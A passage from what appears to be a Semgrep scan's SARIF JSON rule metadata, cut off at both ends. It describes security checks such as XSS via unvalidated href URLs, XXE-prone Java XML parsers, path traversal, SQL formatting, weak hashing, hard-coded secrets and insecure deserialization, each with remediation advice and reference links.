Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-href-url.react-href-url)\n - [https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts](https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"helpUri":"https://semgrep.dev/r/typescript.react.react-href-url.react-href-url","id":"typescript.react.react-href-url.react-href-url","name":"typescript.react.react-href-url.react-href-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-href-url.react-href-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request)\n - [https://godoc.org/github.com/dghubble/sling#Sling.Add](https://godoc.org/github.com/dghubble/sling#Sling.Add)\n - [https://github.com/dghubble/sling](https://github.com/dghubble/sling)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"help":{"markdown":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","id":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","name":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-redirect-to.check-redirect-to"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"help":{"markdown":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"helpUri":"https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","id":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","name":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","properties":{"precision":"very-high","tags":["CWE-300: Channel Accessible by Non-Endpoint","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","id":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","name":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"help":{"markdown":"Detected possible formatted SQL query. Use parameterized queries instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query)\n - [https://stackoverflow.com/questions/775296/mysql-parameterized-queries](https://stackoverflow.com/questions/775296/mysql-parameterized-queries)\n","text":"Detected possible formatted SQL query. Use parameterized queries instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query","id":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","name":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.formatted-sql-query.formatted-sql-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1","id":"clojure.lang.security.use-of-sha1.use-of-sha1","name":"clojure.lang.security.use-of-sha1.use-of-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-sha1.use-of-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"help":{"markdown":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file)\n - [https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions](https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions)\n","text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file","id":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","name":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.filesystem.world-writable-file.world-writable-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"help":{"markdown":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","id":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","name":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"help":{"markdown":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec)\n","text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","id":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","name":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","properties":{"precision":"very-high","tags":["CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')","CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","id":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","name":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted 